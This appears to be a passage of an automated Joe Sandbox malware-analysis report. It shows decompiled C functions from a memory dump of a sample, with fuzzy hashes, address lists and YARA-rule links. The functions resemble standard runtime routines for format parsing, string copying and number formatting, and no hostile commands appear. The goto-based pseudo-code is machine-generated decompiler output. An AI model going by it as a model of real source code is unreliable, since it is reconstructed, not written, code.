                                                                                                                                                                                                                              • Opcode ID: 5e0b3e90a63b93ed02122b09ca052973d3a5f6ffb504a1801dee1aa00761cb4f
                                                                                                                                                                                                                              • Instruction ID: aab8a1e7f437dd2a0238710a58be35f61ab6b48d6271ab737673351d984fcf7d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e0b3e90a63b93ed02122b09ca052973d3a5f6ffb504a1801dee1aa00761cb4f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7DD109B7A09647A5EB64ABA6840067EA7E1EB44F4CFD40935CE4D033D5CF39E842E360
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C515D0 Relevance: .2, Instructions: 244COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                                                                                              			E00007FF77FF735C515D0(signed int __esi, long long __rbx, signed long long __rcx, signed int __rbp, void* __r8, long long _a16, long long _a24) {
				long long _v32;
				long long _v40;
				void* __rdi;
				void* __rsi;
				signed int _t113;
				void* _t118;
				signed int _t133;
				signed int _t135;
				void* _t139;
				signed int _t141;
				signed int _t150;
				void* _t163;
				intOrPtr _t171;
				intOrPtr* _t173;
				intOrPtr* _t184;
				intOrPtr* _t189;
				signed long long _t192;
				signed long long _t194;
				intOrPtr _t200;
				intOrPtr _t202;
				void* _t204;
				void* _t209;
				void* _t211;
				signed int _t212;
				void* _t217;

				_t217 = __r8;
				_t212 = __rbp;
				_t194 = __rcx;
				_a16 = __rbx;
				_a24 = __rbp;
				_t171 =  *((intOrPtr*)(__rcx + 8));
				_t141 = __esi | 0xffffffff;
				_t192 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x460)) != __rbp) goto 0x35c51607;
				 *((char*)(_t171 + 0x30)) = 1;
				 *((intOrPtr*)(_t171 + 0x2c)) = 0x16;
				goto 0x35c51935;
				if ( *((intOrPtr*)(__rcx + 0x10)) != __rbp) goto 0x35c5163d;
				 *((char*)(_t171 + 0x30)) = 1;
				r9d = 0;
				 *((intOrPtr*)(_t171 + 0x2c)) = 0x16;
				r8d = 0;
				_v32 =  *((intOrPtr*)(__rcx + 8));
				_v40 = __rbp;
				E00007FF77FF735C59330( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t204, _t211, __rbp, __r8);
				goto 0x35c518e3;
				 *((intOrPtr*)(_t194 + 0x468)) =  *((intOrPtr*)(_t194 + 0x468)) + 1;
				if ( *((intOrPtr*)(_t194 + 0x468)) == 2) goto 0x35c518e0;
				_t173 =  *((intOrPtr*)(_t192 + 0x10));
				 *((intOrPtr*)(_t192 + 0x48)) = 0;
				 *(_t192 + 0x24) = bpl;
				r8b =  *_t173;
				 *((long long*)(_t192 + 0x10)) = _t173 + 1;
				 *((intOrPtr*)(_t192 + 0x39)) = r8b;
				if (r8b == 0) goto 0x35c518cd;
				r9b = r8b;
				if ( *(_t192 + 0x20) < 0) goto 0x35c518cd;
				_t22 = _t217 - 0x20; // -32
				if (_t22 - 0x5a > 0) goto 0x35c5169f;
				goto 0x35c516a2;
				_t113 =  *(0x35c6f9a0 + (r8b - 0x20 + _t194 * 8) * 2) & 0x000000ff;
				 *(_t192 + 0x24) = _t113;
				if (_t113 - 8 >= 0) goto 0x35c51922;
				_t150 = _t113;
				if (_t150 == 0) goto 0x35c517dc;
				if (_t150 == 0) goto 0x35c517c5;
				if (_t150 == 0) goto 0x35c51776;
				if (_t150 == 0) goto 0x35c5173f;
				if (_t150 == 0) goto 0x35c51737;
				if (_t150 == 0) goto 0x35c5170d;
				if (_t150 == 0) goto 0x35c51703;
				if (_t113 - 0xfffffffffffffffc != 1) goto 0x35c5194e;
				E00007FF77FF735C51F48(_t139, _t192, _t192, r8b - 0x20 + _t194 * 8, _t209, _t211, _t217);
				goto 0x35c51769;
				E00007FF77FF735C51C18(_t192);
				goto 0x35c51769;
				if (r8b == 0x2a) goto 0x35c51721;
				E00007FF77FF735C514B0(_t192, _t192, _t192 + 0x30, _t211);
				goto 0x35c51769;
				 *((long long*)(_t192 + 0x18)) =  *((long long*)(_t192 + 0x18)) + 8;
				_t133 =  *( *((intOrPtr*)(_t192 + 0x18)) - 8);
				_t134 =  <  ? _t141 : _t133;
				 *(_t192 + 0x30) =  <  ? _t141 : _t133;
				goto 0x35c51767;
				 *(_t192 + 0x30) = 0;
				goto 0x35c518af;
				if (r8b == 0x2a) goto 0x35c5174b;
				goto 0x35c51717;
				 *((long long*)(_t192 + 0x18)) =  *((long long*)(_t192 + 0x18)) + 8;
				_t135 =  *( *((intOrPtr*)(_t192 + 0x18)) - 8);
				 *(_t192 + 0x2c) = _t135;
				if (_t135 >= 0) goto 0x35c51767;
				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000004;
				 *(_t192 + 0x2c) =  ~_t135;
				if (1 == 0) goto 0x35c5194e;
				goto 0x35c518af;
				if (r8b == 0x20) goto 0x35c517bc;
				if (r8b == 0x23) goto 0x35c517b3;
				if (r8b == 0x2b) goto 0x35c517aa;
				if (r8b == 0x2d) goto 0x35c517a1;
				if (r8b != 0x30) goto 0x35c518af;
				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000008;
				goto 0x35c518af;
				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000004;
				goto 0x35c518af;
				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000001;
				goto 0x35c518af;
				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000020;
				goto 0x35c518af;
				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000002;
				goto 0x35c518af;
				 *(_t192 + 0x28) = _t212;
				 *(_t192 + 0x38) = bpl;
				 *(_t192 + 0x30) = _t141;
				 *((intOrPtr*)(_t192 + 0x34)) = 0;
				 *(_t192 + 0x4c) = bpl;
				goto 0x35c518af;
				 *(_t192 + 0x4c) = bpl;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t192 + 8)) + 0x28)) != bpl) goto 0x35c517f9;
				_t118 = E00007FF77FF735C53100( *((intOrPtr*)(_t192 + 0x18)), _t192,  *((intOrPtr*)(_t192 + 8)), _t211);
				r8b =  *((intOrPtr*)(_t192 + 0x39));
				r9b = r8b;
				_t163 = _t118 - _t141;
				if (_t163 < 0) goto 0x35c51870;
				if (_t163 == 0) goto 0x35c51870;
				_t200 =  *((intOrPtr*)(_t192 + 0x460));
				if ( *((intOrPtr*)(_t200 + 0x10)) !=  *((intOrPtr*)(_t200 + 8))) goto 0x35c51837;
				if ( *((intOrPtr*)(_t200 + 0x18)) == bpl) goto 0x35c51832;
				 *(_t192 + 0x20) =  *(_t192 + 0x20) + 1;
				goto 0x35c51855;
				 *(_t192 + 0x20) = _t141;
				goto 0x35c51855;
				 *(_t192 + 0x20) =  *(_t192 + 0x20) + 1;
				 *((long long*)(_t200 + 0x10)) =  *((long long*)(_t200 + 0x10)) + 1;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x460)))))) = r8b;
				 *((long long*)( *((intOrPtr*)(_t192 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t192 + 0x460)))) + 1;
				_t184 =  *((intOrPtr*)(_t192 + 0x10));
				r9b =  *_t184;
				 *((long long*)(_t192 + 0x10)) = _t184 + 1;
				 *((intOrPtr*)(_t192 + 0x39)) = r9b;
				if (r9b == 0) goto 0x35c518f6;
				_t202 =  *((intOrPtr*)(_t192 + 0x460));
				if ( *((intOrPtr*)(_t202 + 0x10)) !=  *((intOrPtr*)(_t202 + 8))) goto 0x35c51891;
				if ( *((intOrPtr*)(_t202 + 0x18)) == bpl) goto 0x35c5188c;
				 *(_t192 + 0x20) =  *(_t192 + 0x20) + 1;
				goto 0x35c518af;
				 *(_t192 + 0x20) = _t141;
				goto 0x35c518af;
				 *(_t192 + 0x20) =  *(_t192 + 0x20) + 1;
				 *((long long*)(_t202 + 0x10)) =  *((long long*)(_t202 + 0x10)) + 1;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x460)))))) = r9b;
				 *((long long*)( *((intOrPtr*)(_t192 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t192 + 0x460)))) + 1;
				_t189 =  *((intOrPtr*)(_t192 + 0x10));
				r8b =  *_t189;
				 *((long long*)(_t192 + 0x10)) = _t189 + 1;
				r9b = r8b;
				 *((intOrPtr*)(_t192 + 0x39)) = r8b;
				if (r8b != 0) goto 0x35c5167c;
				 *((intOrPtr*)(_t192 + 0x468)) =  *((intOrPtr*)(_t192 + 0x468)) + 1;
				if ( *((intOrPtr*)(_t192 + 0x468)) != 2) goto 0x35c51657;
				return  *(_t192 + 0x20);
			}




























                                                                                                                                                                                                                              0x7ff735c515d0
                                                                                                                                                                                                                              0x7ff735c515d0
                                                                                                                                                                                                                              0x7ff735c515d0
                                                                                                                                                                                                                              0x7ff735c515d0
                                                                                                                                                                                                                              0x7ff735c515d5
                                                                                                                                                                                                                              0x7ff735c515e2
                                                                                                                                                                                                                              0x7ff735c515e6
                                                                                                                                                                                                                              0x7ff735c515eb
                                                                                                                                                                                                                              0x7ff735c515f5
                                                                                                                                                                                                                              0x7ff735c515f7
                                                                                                                                                                                                                              0x7ff735c515fb
                                                                                                                                                                                                                              0x7ff735c51602
                                                                                                                                                                                                                              0x7ff735c5160b
                                                                                                                                                                                                                              0x7ff735c5160d
                                                                                                                                                                                                                              0x7ff735c51611
                                                                                                                                                                                                                              0x7ff735c51614
                                                                                                                                                                                                                              0x7ff735c5161b
                                                                                                                                                                                                                              0x7ff735c51624
                                                                                                                                                                                                                              0x7ff735c5162b
                                                                                                                                                                                                                              0x7ff735c51630
                                                                                                                                                                                                                              0x7ff735c51638
                                                                                                                                                                                                                              0x7ff735c5163d
                                                                                                                                                                                                                              0x7ff735c5164a
                                                                                                                                                                                                                              0x7ff735c51657
                                                                                                                                                                                                                              0x7ff735c5165b
                                                                                                                                                                                                                              0x7ff735c5165e
                                                                                                                                                                                                                              0x7ff735c51662
                                                                                                                                                                                                                              0x7ff735c51668
                                                                                                                                                                                                                              0x7ff735c5166c
                                                                                                                                                                                                                              0x7ff735c51673
                                                                                                                                                                                                                              0x7ff735c51679
                                                                                                                                                                                                                              0x7ff735c5167f
                                                                                                                                                                                                                              0x7ff735c51685
                                                                                                                                                                                                                              0x7ff735c5168b
                                                                                                                                                                                                                              0x7ff735c5169d
                                                                                                                                                                                                                              0x7ff735c516b0
                                                                                                                                                                                                                              0x7ff735c516b5
                                                                                                                                                                                                                              0x7ff735c516ba
                                                                                                                                                                                                                              0x7ff735c516c2
                                                                                                                                                                                                                              0x7ff735c516c4
                                                                                                                                                                                                                              0x7ff735c516cd
                                                                                                                                                                                                                              0x7ff735c516d6
                                                                                                                                                                                                                              0x7ff735c516df
                                                                                                                                                                                                                              0x7ff735c516e4
                                                                                                                                                                                                                              0x7ff735c516e9
                                                                                                                                                                                                                              0x7ff735c516ee
                                                                                                                                                                                                                              0x7ff735c516f3
                                                                                                                                                                                                                              0x7ff735c516fc
                                                                                                                                                                                                                              0x7ff735c51701
                                                                                                                                                                                                                              0x7ff735c51706
                                                                                                                                                                                                                              0x7ff735c5170b
                                                                                                                                                                                                                              0x7ff735c51711
                                                                                                                                                                                                                              0x7ff735c5171a
                                                                                                                                                                                                                              0x7ff735c5171f
                                                                                                                                                                                                                              0x7ff735c51721
                                                                                                                                                                                                                              0x7ff735c5172a
                                                                                                                                                                                                                              0x7ff735c5172f
                                                                                                                                                                                                                              0x7ff735c51732
                                                                                                                                                                                                                              0x7ff735c51735
                                                                                                                                                                                                                              0x7ff735c51737
                                                                                                                                                                                                                              0x7ff735c5173a
                                                                                                                                                                                                                              0x7ff735c51743
                                                                                                                                                                                                                              0x7ff735c51749
                                                                                                                                                                                                                              0x7ff735c5174b
                                                                                                                                                                                                                              0x7ff735c51754
                                                                                                                                                                                                                              0x7ff735c51757
                                                                                                                                                                                                                              0x7ff735c5175c
                                                                                                                                                                                                                              0x7ff735c5175e
                                                                                                                                                                                                                              0x7ff735c51764
                                                                                                                                                                                                                              0x7ff735c5176b
                                                                                                                                                                                                                              0x7ff735c51771
                                                                                                                                                                                                                              0x7ff735c5177a
                                                                                                                                                                                                                              0x7ff735c51780
                                                                                                                                                                                                                              0x7ff735c51786
                                                                                                                                                                                                                              0x7ff735c5178c
                                                                                                                                                                                                                              0x7ff735c51792
                                                                                                                                                                                                                              0x7ff735c51798
                                                                                                                                                                                                                              0x7ff735c5179c
                                                                                                                                                                                                                              0x7ff735c517a1
                                                                                                                                                                                                                              0x7ff735c517a5
                                                                                                                                                                                                                              0x7ff735c517aa
                                                                                                                                                                                                                              0x7ff735c517ae
                                                                                                                                                                                                                              0x7ff735c517b3
                                                                                                                                                                                                                              0x7ff735c517b7
                                                                                                                                                                                                                              0x7ff735c517bc
                                                                                                                                                                                                                              0x7ff735c517c0
                                                                                                                                                                                                                              0x7ff735c517c5
                                                                                                                                                                                                                              0x7ff735c517c9
                                                                                                                                                                                                                              0x7ff735c517cd
                                                                                                                                                                                                                              0x7ff735c517d0
                                                                                                                                                                                                                              0x7ff735c517d3
                                                                                                                                                                                                                              0x7ff735c517d7
                                                                                                                                                                                                                              0x7ff735c517e0
                                                                                                                                                                                                                              0x7ff735c517e8
                                                                                                                                                                                                                              0x7ff735c517ed
                                                                                                                                                                                                                              0x7ff735c517f2
                                                                                                                                                                                                                              0x7ff735c517f6
                                                                                                                                                                                                                              0x7ff735c517fd
                                                                                                                                                                                                                              0x7ff735c517ff
                                                                                                                                                                                                                              0x7ff735c51814
                                                                                                                                                                                                                              0x7ff735c51816
                                                                                                                                                                                                                              0x7ff735c51825
                                                                                                                                                                                                                              0x7ff735c5182b
                                                                                                                                                                                                                              0x7ff735c5182d
                                                                                                                                                                                                                              0x7ff735c51830
                                                                                                                                                                                                                              0x7ff735c51832
                                                                                                                                                                                                                              0x7ff735c51835
                                                                                                                                                                                                                              0x7ff735c51837
                                                                                                                                                                                                                              0x7ff735c5183a
                                                                                                                                                                                                                              0x7ff735c51848
                                                                                                                                                                                                                              0x7ff735c51852
                                                                                                                                                                                                                              0x7ff735c51855
                                                                                                                                                                                                                              0x7ff735c51859
                                                                                                                                                                                                                              0x7ff735c5185f
                                                                                                                                                                                                                              0x7ff735c51863
                                                                                                                                                                                                                              0x7ff735c5186a
                                                                                                                                                                                                                              0x7ff735c51870
                                                                                                                                                                                                                              0x7ff735c5187f
                                                                                                                                                                                                                              0x7ff735c51885
                                                                                                                                                                                                                              0x7ff735c51887
                                                                                                                                                                                                                              0x7ff735c5188a
                                                                                                                                                                                                                              0x7ff735c5188c
                                                                                                                                                                                                                              0x7ff735c5188f
                                                                                                                                                                                                                              0x7ff735c51891
                                                                                                                                                                                                                              0x7ff735c51894
                                                                                                                                                                                                                              0x7ff735c518a2
                                                                                                                                                                                                                              0x7ff735c518ac
                                                                                                                                                                                                                              0x7ff735c518af
                                                                                                                                                                                                                              0x7ff735c518b3
                                                                                                                                                                                                                              0x7ff735c518b9
                                                                                                                                                                                                                              0x7ff735c518bd
                                                                                                                                                                                                                              0x7ff735c518c0
                                                                                                                                                                                                                              0x7ff735c518c7
                                                                                                                                                                                                                              0x7ff735c518cd
                                                                                                                                                                                                                              0x7ff735c518da
                                                                                                                                                                                                                              0x7ff735c518f5

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 9ac8ee536d0fd044a85ef3676fd206071e320f7659774b1f4cca67e0007b7ff3
                                                                                                                                                                                                                              • Instruction ID: 0d3dfe51b3eca6cb8223b2541f13feb71e2cb580c0362db27c3fa538b24e7790
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ac8ee536d0fd044a85ef3676fd206071e320f7659774b1f4cca67e0007b7ff3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3B17FB390879796E765AF7A805813C7BA0E705F9CFA90939CA8D07395CF39D441E720
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5CDA8 Relevance: .2, Instructions: 198COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                                                              			E00007FF77FF735C5CDA8(void* __rax, long long __rbx, unsigned int* __rcx, void* __rdx, void* __rdi, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, intOrPtr _a40, intOrPtr _a48, void* _a64, long long _a80) {
				long long _v48;
				signed long long _v56;
				long long _t37;
				long long _t44;
				unsigned int* _t49;
				void* _t51;
				void* _t58;

				_a8 = __rbx;
				_a16 = __rsi;
				_t58 = __r8;
				_t49 = __rcx;
				if (__rdx != 0) goto 0x35c5cdf8;
				_t44 = _a80;
				_v48 = _t44;
				 *((char*)(_t44 + 0x30)) = 1;
				 *((intOrPtr*)(_t44 + 0x2c)) = __rdx + 0x16;
				_v56 = _v56 & 0x00000000;
				r9d = 0;
				r8d = 0;
				E00007FF77FF735C59330(__rax, __rbx, _t44, __rdx, __rsi, _t51, __r8);
				goto 0x35c5d067;
				if (_t58 != 0) goto 0x35c5ce18;
				_t37 = _a80;
				_v48 = _t37;
				 *((char*)(_t37 + 0x30)) = 1;
				 *((intOrPtr*)(_t37 + 0x2c)) = 0x16;
				goto 0x35c5cddc;
				if (__r9 == 0) goto 0x35c5cdfd;
				if (_a40 == 0) goto 0x35c5cdfd;
				if (_a48 == 0x41) goto 0x35c5ce43;
				if (_t44 - 0x45 - 2 <= 0) goto 0x35c5ce43;
				sil = 0;
				goto 0x35c5ce46;
				sil = 1;
				if (0 != 0) goto 0x35c5cf3d;
				if ( *_t49 >> 0x34 != 0x7ff) goto 0x35c5cf3d;
				r8d = 0xc;
			}










                                                                                                                                                                                                                              0x7ff735c5cda8
                                                                                                                                                                                                                              0x7ff735c5cdad
                                                                                                                                                                                                                              0x7ff735c5cdb7
                                                                                                                                                                                                                              0x7ff735c5cdbd
                                                                                                                                                                                                                              0x7ff735c5cdc3
                                                                                                                                                                                                                              0x7ff735c5cdc5
                                                                                                                                                                                                                              0x7ff735c5cdd0
                                                                                                                                                                                                                              0x7ff735c5cdd5
                                                                                                                                                                                                                              0x7ff735c5cdd9
                                                                                                                                                                                                                              0x7ff735c5cddc
                                                                                                                                                                                                                              0x7ff735c5cde2
                                                                                                                                                                                                                              0x7ff735c5cde5
                                                                                                                                                                                                                              0x7ff735c5cdec
                                                                                                                                                                                                                              0x7ff735c5cdf3
                                                                                                                                                                                                                              0x7ff735c5cdfb
                                                                                                                                                                                                                              0x7ff735c5cdfd
                                                                                                                                                                                                                              0x7ff735c5ce0a
                                                                                                                                                                                                                              0x7ff735c5ce0f
                                                                                                                                                                                                                              0x7ff735c5ce13
                                                                                                                                                                                                                              0x7ff735c5ce16
                                                                                                                                                                                                                              0x7ff735c5ce1b
                                                                                                                                                                                                                              0x7ff735c5ce28
                                                                                                                                                                                                                              0x7ff735c5ce34
                                                                                                                                                                                                                              0x7ff735c5ce3c
                                                                                                                                                                                                                              0x7ff735c5ce3e
                                                                                                                                                                                                                              0x7ff735c5ce41
                                                                                                                                                                                                                              0x7ff735c5ce43
                                                                                                                                                                                                                              0x7ff735c5ce51
                                                                                                                                                                                                                              0x7ff735c5ce6c
                                                                                                                                                                                                                              0x7ff735c5ce7f

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 62fccb4233998495ca5fc733d54eb8dc1ef15739fc06d219881147212c61e499
                                                                                                                                                                                                                              • Instruction ID: bb57a6ede946c0306f660be0ba7e9564e79feb26c1ac7307a058ec88f9d35562
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62fccb4233998495ca5fc733d54eb8dc1ef15739fc06d219881147212c61e499
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA81F5B3A0878356EB74DB5A9480379AA90FB85BD8F904635EA9D43B85CF3CD904DB10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C49520 Relevance: .2, Instructions: 197COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                              			E00007FF77FF735C49520(void* __rdx) {

				if (__rdx != 0) goto 0x35c4952b;
				return 0;
			}



                                                                                                                                                                                                                              0x7ff735c49526
                                                                                                                                                                                                                              0x7ff735c4952a

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: fe52d29f8de13981d5b293df9db1c1ca91f4aa62041e6ceb6d8fe853fdbeeb9d
                                                                                                                                                                                                                              • Instruction ID: db938dccddfe45cfbf22e14f3ca9ea05464aa902327c070761b4615b235e1489
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe52d29f8de13981d5b293df9db1c1ca91f4aa62041e6ceb6d8fe853fdbeeb9d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5371AEB37341749BEB658B2E9114EA933A0F36A74DFC16105EB8447B81CE3EB921CB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C54630 Relevance: .1, Instructions: 138COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                              			E00007FF77FF735C54630(signed int __ecx, signed int __edx, void* __eflags, intOrPtr* __rcx, intOrPtr* __rdx, void* __r8) {
				unsigned int _t13;
				unsigned int _t14;
				char _t15;
				char _t33;
				signed int* _t41;
				void* _t52;

				if (__eflags == 0) goto 0x35c546eb;
				if ((__ecx & 0x00000007) == 0) goto 0x35c54650;
				_t13 =  *((intOrPtr*)(__rcx));
				if (_t13 == 0) goto 0x35c546c6;
				_t41 = __rcx + 1;
				if ((__ecx & 0x00000007) != 0) goto 0x35c54641;
				if ((0x01010100 & ( *_t41 ^ 0xffffffff ^ 0xfefefeff +  *_t41)) == 0) goto 0x35c54650;
				if (_t13 == 0) goto 0x35c546c6;
				if (_t13 == 0) goto 0x35c546c6;
				if (_t13 == 0) goto 0x35c546c6;
				if (_t13 == 0) goto 0x35c546c6;
				if (_t13 == 0) goto 0x35c546c6;
				if (_t13 == 0) goto 0x35c546c6;
				_t14 = _t13 >> 0x10;
				if (_t14 == 0) goto 0x35c546c6;
				if (_t14 == 0) goto 0x35c546c6;
				goto 0x35c54650;
				_t52 =  &(_t41[2]) - 8 + 8 - __rdx;
				if ((__edx & 0x00000007) == 0) goto 0x35c546f8;
				_t15 =  *((intOrPtr*)(__rdx));
				 *((char*)(__rdx + _t52)) = _t15;
				_t33 = _t15;
				if (_t33 == 0) goto 0x35c546eb;
				if (_t33 == 0) goto 0x35c546e6;
				if ((__edx & 0x00000007) != 0) goto 0x35c546ce;
				goto 0x35c546f8;
				 *((char*)(__rdx + 1 + _t52)) = 0;
				return 0;
			}









                                                                                                                                                                                                                              0x7ff735c54636
                                                                                                                                                                                                                              0x7ff735c5463f
                                                                                                                                                                                                                              0x7ff735c54641
                                                                                                                                                                                                                              0x7ff735c54645
                                                                                                                                                                                                                              0x7ff735c54647
                                                                                                                                                                                                                              0x7ff735c5464d
                                                                                                                                                                                                                              0x7ff735c5467b
                                                                                                                                                                                                                              0x7ff735c54683
                                                                                                                                                                                                                              0x7ff735c5468a
                                                                                                                                                                                                                              0x7ff735c54695
                                                                                                                                                                                                                              0x7ff735c5469c
                                                                                                                                                                                                                              0x7ff735c546a7
                                                                                                                                                                                                                              0x7ff735c546ae
                                                                                                                                                                                                                              0x7ff735c546b3
                                                                                                                                                                                                                              0x7ff735c546b8
                                                                                                                                                                                                                              0x7ff735c546bf
                                                                                                                                                                                                                              0x7ff735c546c4
                                                                                                                                                                                                                              0x7ff735c546c6
                                                                                                                                                                                                                              0x7ff735c546cc
                                                                                                                                                                                                                              0x7ff735c546ce
                                                                                                                                                                                                                              0x7ff735c546d0
                                                                                                                                                                                                                              0x7ff735c546d3
                                                                                                                                                                                                                              0x7ff735c546d5
                                                                                                                                                                                                                              0x7ff735c546dd
                                                                                                                                                                                                                              0x7ff735c546e2
                                                                                                                                                                                                                              0x7ff735c546e4
                                                                                                                                                                                                                              0x7ff735c546e8
                                                                                                                                                                                                                              0x7ff735c546ee

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
